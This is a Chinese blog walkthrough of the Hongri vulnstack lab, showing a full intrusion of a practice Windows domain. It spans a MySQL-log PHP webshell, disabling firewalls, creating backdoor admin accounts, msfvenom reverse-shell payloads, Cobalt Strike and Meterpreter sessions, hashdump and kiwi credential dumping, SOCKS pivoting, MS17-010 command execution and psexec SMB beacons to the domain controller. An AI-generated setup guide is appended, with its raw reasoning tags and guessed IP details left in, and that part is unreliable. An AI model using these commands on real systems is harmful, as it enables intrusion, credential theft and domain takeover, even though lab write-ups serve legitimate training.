内网域渗透总结(红日靶场一)

本文详细介绍了如何在红日靶场环境下搭建内网靶场,进行web渗透、横向渗透以及信息收集等步骤,并提供了针对不同目标的渗透策略与技术手段。包括收集信息、利用弱口令、开启日志功能、部署木马、提权等关键环节的操作流程与技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、靶场环境搭建

  • 红日靶场:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
  • 靶机通用密码:hongrisec@2019
  • win7
  • win2003
  • win2008

这个搭建靶场的过程是我经过实际操作(踩坑)总结的最简单省事的方式。

首先创建一个仅主机模式的子网作为内网,地址为:192.168.52.0。我这里是直接修改的VMnet1。

192.168.50.0/24 即 VMnet8 当作靶场里的外网。

在这里插入图片描述
将 windows2003 和 windows2008 两台主机都设置为自定义VMnet1
在这里插入图片描述
win7是边缘主机,对外的公网ip搭建着web服务的同时还连接着内网,因此需要两块网卡。
在这里插入图片描述
注意:这两个网卡的顺序最好和我这个一致,不然有可能内网连不通!即内网网卡要排在前面。
在这里插入图片描述
最后还有我们的kali攻击机, 网络是在 50 段,即外网段。

网络拓扑图:

在这里插入图片描述

二、web渗透

上来先收集一波信息,nmap扫描一下端口

nmap -sV -Pn 192.168.50.133
-sV: 指定让Nmap进行版本侦测
-PN: 跳过Ping扫描阶段

扫描出两个端口80 3306,存在web服务和mysql数据库。
在这里插入图片描述

访问80端口,发现是个phpstudy探针,说明网站是phpstudy搭建的。
在这里插入图片描述
这个页面泄露了很多信息,服务器版本、php版本、绝对路径、管理员邮箱等。

可以在这里检测mysql是否存在弱口令
在这里插入图片描述
测试 root root 发现存在弱口令。因为网站是phpstudy搭建,很可能存在 phpmyadmin 后台,

直接来扫一下目录
在这里插入图片描述
确实存在phpmyadmin,还扫到了一个备份文件,打开发现是yxcms的网站源码,应该部署着这个CMS 。

使用弱口令登进去phpmyadmin,查看数据库是否有导入权限,看能否导入木马

SHOW GLOBAL VARIABLES LIKE '%secure%'

在这里插入图片描述
没有导入权限,查看是否有开启全局日志

SHOW GLOBAL VARIABLES LIKE '%general%'

在这里插入图片描述
全局日志功能关闭,不过可以通过命令开启,并修改日志保存的绝对路径,这里的路径可以在探针页面获得。

SET GLOBAL general_log = ON;# 开启日志
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php';# 设置日志位置为网站目录

接着向日志文件写shell

select '<?php eval ($_POST[s]);?>'

执行这条语句之后,日志会将select后的查询语句记录进日志,从而让日志变成一个一句话木马。

用蚁剑连接
在这里插入图片描述
连接成功。

我们再来看下部署的CMS,打开网站
在这里插入图片描述
从右下角看到了网站后台的登录地址和默认账号密码,尝试登录
在这里插入图片描述
在这里插入图片描述

成功登录。在前台模板功能里发现可以直接编辑php文件,尝试写入shell。
在这里插入图片描述
随便找一个文件添加一句话
在这里插入图片描述
保存后,接下来就要想办法找到这个info.php所在的目录了,先来扫描一下后台
在这里插入图片描述
点进去发现这个网站还存在敏感信息泄露
在这里插入图片描述
那就好办了,为了防止疏漏我们直接去看前面扫到的备份文件(如果没有备份文件可以根据网站版本去网上自己下载)
在这里插入图片描述
找到了目标文件,尝试连接。
在这里插入图片描述
成功连接。来看一下拿到的shell是什么权限
在这里插入图片描述
太好了,是管理员权限。

紧接着先把防火墙关了,养成好习惯。

netsh advfirewall set allprofiles state off #win关闭防火墙
1、远程登录

尝试添加一个用户,进行远程登陆

net user qqq qwer@1234 /add # 添加账户密码
net localgroup administrators qqq /add  # 添加为管理员权限
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 
# 开启3389端口

在这里插入图片描述
用户添加成功,尝试登录
在这里插入图片描述
成功登录。(如果防火墙没关会登录失败)

2、上线CS:

启动服务
在这里插入图片描述
设置监听:
在这里插入图片描述
生成一个EXE后门
在这里插入图片描述
通过蚁剑上传并执行
在这里插入图片描述
在这里插入图片描述
成功上线。执行sleep 0,不然回显会很慢

sleep 0则表示进入交互模式,任何输入的命令都会被立即执行。

在这里插入图片描述
shell systeminfo 查看系统信息,看到只打了四个补丁,尝试进行提权
在这里插入图片描述
在这里插入图片描述
提权成功。

3、上线MSF:

msf生成木马

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP> LPORT=< Your Port> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< Your IP> LPORT=< Your Port> -f exe > shell.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=< Your IP> LPORT=< Your Port> -f raw > shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< Your IP> LPORT=< Your Port> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=< Your IP> LPORT=< Your Port> -f raw > shell.jsp

Python

msfvenom -p cmd/unix/reverse_python LHOST=< Your IP> LPORT=< Your Port> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=< Your IP> LPORT=< Your Port> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=< Your IP> LPORT=< Your Port> -f raw > shell.pl

在这里插入图片描述
开启msf监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.130
set lport 7777
run

在这里插入图片描述
通过蚁剑将生成的木马上传并运行。
在这里插入图片描述
成功上线。再来尝试提一下权:
在这里插入图片描述
因为是administrator用户,所以很容易提权成功。

三、内网信息收集

开始进行内网的信息收集阶段。

获取目标主机的shell,输入chcp 65001可解决乱码问题(或者用蚁剑的终端)。
在这里插入图片描述
看一下路由信息

route print     # 打印路由信息

在这里插入图片描述
可知内网网段应该是 192.168.52.1/24

关于Windows域: 详细信息

Windows域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器(DC)的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 Windows域的概念与工作组的概念形成对比。

首先判断是否在域中,域控制器一般集成了DNS服务,通过 ipconfig /all,即可简单判断。
在这里插入图片描述
该域名为god.org,还可以使用下面这种方式。

net view /domain  #查询当前主机是否加入域,如果加入则列出域名

在这里插入图片描述
查看域内信息

net config Workstation #查看计算机名、全名、用户名、系统版本、工作站、域、登录域

在这里插入图片描述
接着定位域控:

net time /domain  #同步域控服务器时间

在这里插入图片描述
域控的域名即 owa.god.org ,用 ping 即可反查出域控ip
在这里插入图片描述
得到域控制器IP为192.168.52.138

再来看一下域内的其它主机

net view  #查看与该计算机位于同一工作组或域中的所有计算机名

在这里插入图片描述
这里的 OWA 就是上面的域控,另一个就是域内的其它主机了。

再来看一下域管理员

net group "domain admins" /domain # 查询域管理员

在这里插入图片描述
很幸运,可以看到这里我们获得的 Administration 就是域控OWA的域管理员 。

看一下域里有几个用户

net user /domain  # 查看域用户,只有域管才能执行

在这里插入图片描述
得到5个域用户名。

尝试抓取主机本地的密码:

hashdump  #导出本地用户账号密码,该命令的使用需要系统权限。

在这里插入图片描述
用户哈希数据的输出格式为:

用户名:SID:LM哈希:NTLM哈希:::

得到了三个本地用户账号,分别为 Administrator、Guest 和 liukaifeng01 。

三个账号的LM哈希aad3b435b51404eeaad3b435b51404ee和NTLM哈希31d6cfe0d16ae931b73c59d7e0c089c0都是空密码。
在这里插入图片描述
这是因为当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,需要修改注册表等用户重新登录后才能成功抓取。

那就尝试抓取域内的账号密码:利用 msf 的 kiwi 模块 详细介绍

load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用

注意执行需要system权限。

creds_all         #列举所有凭据
creds_kerberos    #列举域内账号密码

在这里插入图片描述
成功得到域账号密码。

目前为止,我们获得的内网信息有:

域名:god.org
域内有五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt
域内三台主机:OWA、ROOT-TVI862UBEH(192.168.52.141)STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143

四、横向渗透

为了让 msf 能访问内网的其他主机,即 52 网段的攻击流量都通过已渗透的这台目标主机(Windows7)的meterpreter会话来传递,需要建立socks反向代理。

注:添加路由一定要在挂代理之前,因为代理需要用到路由功能

1、添加路由、挂上Socks4a代理

使用 msf+proxychains 搭建socks4a隧道。

在之前监听到的shell中设置内网路由

run autoroute -s 192.168.52.0/24  # 添加内网的路由
run autoroute -p  # 查看路由

在这里插入图片描述
开启代理

background

use auxiliary/server/socks4a

set SRVHOST 127.0.0.1(这里因为是本机可以写本地ip)

run

在这里插入图片描述
然后在 proxychains 的配置文件 /etc/proxychains.conf,添加本机的1080端口:

socks4 127.0.0.1 1080

在这里插入图片描述
然后执行命令时,前面加上 proxychains 即可。如:

proxychains ping 192.168.52.141(域成员ip)

在这里插入图片描述
访问成功,下面就开始嚯嚯内网的两台主机。

2、域成员渗透

首先看一下域成员的端口开放情况:

全扫时间有点久,这里因为是练习,就只对高危端口进行扫描

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141

在这里插入图片描述

看到135、445是开放的,并且这台终端为 win_2003,32位系统。

常见端口漏洞:

  • 21-FTP,看是否存在匿名访问
  • 22-SSH,看是否存在弱口令
  • 80-HTTP,常见web漏洞
  • 443-openssl,心脏出血
  • 445-smb,ms17-010、ms08-067
  • 3306-mysql,弱口令
  • 1433-mssql,弱口令
  • 1521-oracle,弱口令
  • 3389-远程连接桌面
  • 6379-redis未授权访问,弱口令
  • 8080-tomcat漏洞

这里开放了445端口,看一下是否存在ms17-010
在这里插入图片描述
确实存在漏洞,使用 use exploit/windows/smb/ms17_010_eternalblue 利用,发现只支持打64位系统,不支持32位。

再换一个模块

use auxiliary/admin/smb/ms17_010_command

set COMMAND net user

set RHOST 192.168.52.141

run

在这里插入图片描述
成功执行命令。接着我们来添加一个用户尝试远程登录一下。

还是使用上面的模块,依次执行下面命令

set command net user sss qwer@1234 /add #添加用户
run # 发现用户添加不成功,后来发现是因为有密码设置策略,密码不能太简单。

set command net localgroup administrators sss /add #管理员权限
run 

set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' 
#开启3389端口
run

set command netsh advfirewall set allprofiles state off #关闭防火墙
run #好像没有防火墙

在这里插入图片描述
然后远程登录

proxychains rdesktop 192.168.52.141

这里注意一定要选这个,因为登陆的是本机。
在这里插入图片描述
成功进来了!
在这里插入图片描述

3、域控渗透

同样的,先扫描一下端口

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.138

在这里插入图片描述
看到其开启了 80 端口,访问网站,发现是IIS初始网站,没有搭建网站,也不存在敏感目录。先不管它,还是先使用 ms17-010 测试一下。

发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。
在这里插入图片描述
再用上面的老方法 use auxiliary/admin/smb/ms17_010_command 发现可以执行。接着添加用户aaa

尝试远程连接
在这里插入图片描述
这里不知道为啥就是登不上,用户确实创建成功了。。。
在这里插入图片描述
防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。再换种方法,转战CS。

SMB Beacon:

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB beacon相对隐蔽。SMB beacon不能直接生成可用载荷, 只能使用 psexec 或 Stageless Payload 上线

使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。
在这里插入图片描述
使用条件:

  • 具有 Beacon 的主机必须接受 445 端口上的连接。
  • 只能链接由同一个 Cobalt Strike 实例管理的 Beacon。
  • 必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据。

这三条这里全都满足,先执行 net view 发现一下域内主机
在这里插入图片描述
在列表这里出现了域内的这两台主机。
在这里插入图片描述
新建一个 Beacon SMB 监听器,名字随便
在这里插入图片描述
域管右键选择psexec
在这里插入图片描述
在这里插入图片描述
点击运行,成功上线域管,这里顺便把域成员也上线了。可以看到 ∞∞ 这个字符 ,这就是派生的SMB Beacon。
在这里插入图片描述
🆗,本次的靶场练习到这里就正式完结啦,经过本次打靶学到了很多!

<think>好的,用户想了解如何搭建红日靶场的环境,需要教程和配置指南。我需要根据提供的引用信息来整理步骤。首先,引用[1]和[2]提到了红日靶场的官网和配置说明,应该从这里获取官方资料。引用[3]中的内容详细描述了靶场搭建的拓扑图、网络配置,以及外网打点的步骤,比如nmap扫描、目录扫描、利用phpmyadmin日志getshell等。引用[4]提供了个超详细的操作指南,适合新手,可能包含具体的虚拟机设置和权限配置,比如关闭Win7防火墙、黄金票据的制作问题。此外,用户可能需要知道环境搭建后的内网攻击步骤,如ms17_010漏洞扫描和利用。 需要注意的是,引用[3]中的目录结构可能对应不同的阶段,比如外网渗透内网信息搜集、横向移动等,但用户现在需要的是环境搭建部分。所以应该聚焦在拓扑图配置、网络设置、虚拟机安装等方面。引用[4]提到制作黄金票据后访问域控的问题,虽然属于后期渗透测试的内容,但环境搭建时需要正确配置域控权限和网络策略,避免出现访问问题。 另外,用户可能对虚拟机软件的选择(如VMware或VirtualBox)、镜像导入、网络适配器配置(如NAT、仅主机模式)有疑问,需要详细说明。引用[3]中的“配置网络”可能涉及设置多个虚拟机的IP地址,确保它们在同子网内,并正确隔离内外网环境。可能还需要关闭防火墙(如Win7防火墙)以便测试,如引用[4]所述。 需要提醒用户注意版权问题,确保从官网下载资源,避免使用非官方镜像。同时,步骤中可能涉及复杂的内网渗透配置,建议分阶段验证,例如先确保各虚拟机互通,再测试外网到内网的连通性。可能遇到的常见问题包括网络不通、服务未启动、权限配置错误等,需提供排查方法,比如检查IP设置、服务状态、防火墙规则等。 最后,根据引用[5],可能有培训课程提供更深入的指导,但用户目前只需基础搭建步骤。因此,回答应结构清晰,分步骤说明,并附上相关引用来源,确保信息可靠。需要检查是否有遗漏的关键点,如虚拟机快照管理、必要的软件安装(如phpMyAdmin、XSS平台等),以及后续测试的基本流程概述,帮助用户搭建后验证环境是否成功。</think>### 红日靶场环境搭建指南 #### 1. **环境准备** - **官网资源下载** 访问红日靶场官网[^2]获取镜像文件(如Windows Server、Win7等虚拟机镜像)及拓扑图。建议使用VMware Workstation或VirtualBox作为虚拟化平台。 - **网络拓扑理解** 根据引用[3]中的靶场拓扑图,配置内外网隔离环境。典型结构包含外网WEB服务器、内网域控服务器(DC)和多个内网主机,需设置NAT和仅主机模式网卡实现网络分层。 #### 2. **虚拟机配置** - **镜像导入与网络适配** 将下载的OVA/OVF镜像导入虚拟机软件,为每台虚拟机分配网络适配器: - **WEB服务器**:外网网卡(NAT模式) + 内网网卡(仅主机模式) - **内网主机(如Win7)**:仅主机模式网卡 - **域控服务器(DC)**:仅主机模式网卡 - **IP地址设置** 根据拓扑图手动配置静态IP,确保内外网互通。例如: - WEB服务器外网IP:`192.168.1.100`,内网IP:`10.10.10.2` - 域控服务器IP:`10.10.10.1` - Win7主机IP:`10.10.10.3` #### 3. **服务与权限配置** - **关闭防火墙** 在Win7和域控服务器中关闭系统防火墙(引用[4]),避免拦截测试流量: ```cmd netsh advfirewall set allprofiles state off ``` - **域环境搭建** 在域控服务器安装Active Directory服务,创建测试域(如`test.local`),将Win7主机加入域。确保域账户权限正常,用于后续黄金票据测试[^4]。 #### 4. **漏洞环境验证** - **外网渗透测试** 使用Kali Linux对WEB服务器进行扫描(引用[3]): ```bash nmap -sV 192.168.1.100 dirsearch -u http://192.168.1.100 -e php,asp ``` - **内网连通性检查** 从WEB服务器通过内网IP访问域控共享目录,验证网络隔离是否生效: ```cmd dir \\10.10.10.1\C$ ``` #### 5. **常见问题解决** - **网络不通** 检查虚拟机网卡模式、IP地址是否冲突,确保网关和DNS设置正确。 - **权限访问失败** 若黄金票据制作后仍无法访问域控(引用[4]),需检查Kerberos票据有效期、系统时间同步及SPN配置。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值